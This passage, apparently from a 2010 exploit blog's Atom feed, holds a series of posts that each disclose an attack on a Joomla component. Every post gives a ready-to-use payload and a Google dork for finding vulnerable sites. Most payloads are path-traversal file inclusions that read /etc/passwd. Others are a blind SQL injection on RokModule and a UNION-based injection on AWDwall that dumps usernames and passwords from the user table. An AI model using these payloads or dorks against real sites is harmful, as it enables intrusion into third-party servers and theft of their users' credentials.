Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_jfeedback&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_jfeedback&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_jfeedback"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2926130297087989157?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2926130297087989157/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2926130297087989157' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2926130297087989157'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2926130297087989157'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-jfeedback-lfi-vuln.html' title='Joomla Component Jfeedback! LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2642972358683399913</id><published>2010-04-11T14:12:00.000+07:00</published><updated>2010-04-11T14:14:34.997+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component JProject Manager LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component JProject Manager Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_jprojectmanager version 1.0&lt;br /&gt;Vendor   : http://www.joomla.ternaria.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_jprojectmanager&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_jprojectmanager&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_jprojectmanager"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2642972358683399913?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2642972358683399913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2642972358683399913' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2642972358683399913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2642972358683399913'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-jproject-manager-lfi.html' title='Joomla Component JProject Manager LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4300428566713780983</id><published>2010-04-11T14:10:00.000+07:00</published><updated>2010-04-11T14:12:33.115+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component RokModule Blind SQLi [moduleid] Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_rokmodule version 1.1&lt;br /&gt;Vendor   : http://www.rockettheme.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_rokmodule&amp;amp;tmpl=component&amp;amp;type=raw&amp;amp;offset=_OFFSET_&amp;amp;moduleid=[BSQLi]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_rokmodule&amp;amp;tmpl=component&amp;amp;type=raw&amp;amp;offset=_OFFSET_&amp;amp;moduleid=140+AND+SUBSTRING(@@version,1,1)=5 &lt;&lt; true&lt;br /&gt;http://localhost/[path]/index.php?option=com_rokmodule&amp;amp;tmpl=component&amp;amp;type=raw&amp;amp;offset=_OFFSET_&amp;amp;moduleid=140+AND+SUBSTRING(@@version,1,1)=4 &lt;&lt; false&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"index.php?option=com_rokmodule" "moduleid"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4300428566713780983?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4300428566713780983/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4300428566713780983' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4300428566713780983'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4300428566713780983'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-rokmodule-blind-sqli.html' title='Joomla Component RokModule Blind SQLi [moduleid] Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2593347822914375984</id><published>2010-04-11T14:08:00.001+07:00</published><updated>2010-04-11T14:09:53.224+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component AlphaUserPoints LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component AlphaUserPoints Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_alphauserpoints version 1.5.5&lt;br /&gt;Vendor   : http://www.alphaplug.com/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_alphauserpoints&amp;amp;view=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_alphauserpoints&amp;amp;view=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_alphauserpoints"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2593347822914375984?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2593347822914375984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2593347822914375984' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2593347822914375984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2593347822914375984'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-alphauserpoints-lfi.html' title='Joomla Component AlphaUserPoints LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1639570738176950910</id><published>2010-04-11T14:05:00.001+07:00</published><updated>2010-04-11T14:07:17.114+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component TICKETbook LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Ticketbook Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_ticketbook version 1.0.1&lt;br /&gt;Vendor   : http://www.demo-page.de/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_ticketbook&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_ticketbook&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_ticketbook"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1639570738176950910?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1639570738176950910/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1639570738176950910' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1639570738176950910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1639570738176950910'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-ticketbook-lfi-vuln.html' title='Joomla Component TICKETbook LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-494954140431922751</id><published>2010-04-11T14:01:00.000+07:00</published><updated>2010-04-11T14:03:31.411+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component TweetLA! LFI Vuln</title><content type='html'>&lt;span style="font-weight: bold;"&gt;[o] Joomla Component TweetLA! Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_tweetla version 1.0.1&lt;br /&gt;Vendor   : http://www.demo-page.de/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://[site]/[path]/index.php?option=com_tweetla&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_tweetla&amp;amp;controller=../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_tweetla"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-494954140431922751?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/494954140431922751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=494954140431922751' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/494954140431922751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/494954140431922751'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-tweetla-lfi-vuln.html' title='Joomla Component TweetLA! LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1081718900189448774</id><published>2010-04-11T13:59:00.004+07:00</published><updated>2010-04-11T14:04:44.938+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component TRAVELbook LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component TRAVELbook Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_travelbook version 1.0.1&lt;br /&gt;Vendor   : http://www.demo-page.de/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_travelbook&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/index.php?option=com_travelbook&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_travelbook"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1081718900189448774?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1081718900189448774/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1081718900189448774' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1081718900189448774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1081718900189448774'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-travelbook-lfi-vuln.html' title='Joomla Component TRAVELbook LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7990833330150880968</id><published>2010-04-11T13:55:00.001+07:00</published><updated>2010-04-11T13:58:15.594+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component spsNewsletter LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component spsNewsletter Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_spsnewsletter&lt;br /&gt;Vendor   : http://www.modernbridge.com/spsNewsletter/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_spsnewsletter&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_spsnewsletter&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_spsnewsletter"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7990833330150880968?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7990833330150880968/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7990833330150880968' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7990833330150880968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7990833330150880968'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-spsnewsletter-lfi-vuln.html' title='Joomla Component spsNewsletter LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3007016229576133699</id><published>2010-04-09T17:52:00.000+07:00</published><updated>2010-04-09T17:54:37.104+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component AWDwall-Joomla LFI &amp; SQLi Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component AWDwall-Joomla LFI &amp;amp; SQLi [cbuser] Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_awdwall version 1.5.4&lt;br /&gt;Vendor   : http://www.awdsolution.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_awdwall&amp;amp;controller=[LFI]&lt;br /&gt;http://localhost/[path]/index.php?option=com_awdwall&amp;amp;view=awdwall&amp;amp;Itemid=1&amp;amp;cbuser=1[SQL]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_awdwall&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;http://localhost/[path]/index.php?option=com_awdwall&amp;amp;view=awdwall&amp;amp;Itemid=1&amp;amp;cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_awdwall"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3007016229576133699?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3007016229576133699/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3007016229576133699' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3007016229576133699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3007016229576133699'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-awdwall-joomla-lfi.html' title='Joomla Component AWDwall-Joomla LFI &amp; SQLi Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3178182425838422346</id><published>2010-04-09T17:49:00.001+07:00</published><updated>2010-04-09T17:51:42.067+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Realtyna Translator LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_realtyna version 1.0.15&lt;br /&gt;Vendor   : http://software.realtyna.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_realtyna&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_realtyna&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_realtyna"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3178182425838422346?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3178182425838422346/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3178182425838422346' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3178182425838422346'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3178182425838422346'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-realtyna-translator.html' title='Joomla Component Realtyna Translator LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2445745563568239679</id><published>2010-04-09T17:42:00.002+07:00</published><updated>2010-04-09T17:48:17.626+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Webee Comments LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Webee Comments Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_webeecomment version 2.0&lt;br /&gt;Vendor   : http://www.onnogroen.nl/webee/&lt;br /&gt;Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_webeecomment&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_webeecomment&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br 